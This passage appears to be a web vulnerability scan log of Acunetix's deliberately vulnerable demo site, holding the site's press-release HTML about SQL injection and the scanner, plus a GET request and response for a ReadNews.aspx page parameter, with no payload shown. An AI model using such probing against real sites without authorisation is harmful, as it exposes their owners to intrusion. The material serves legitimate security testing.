cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a 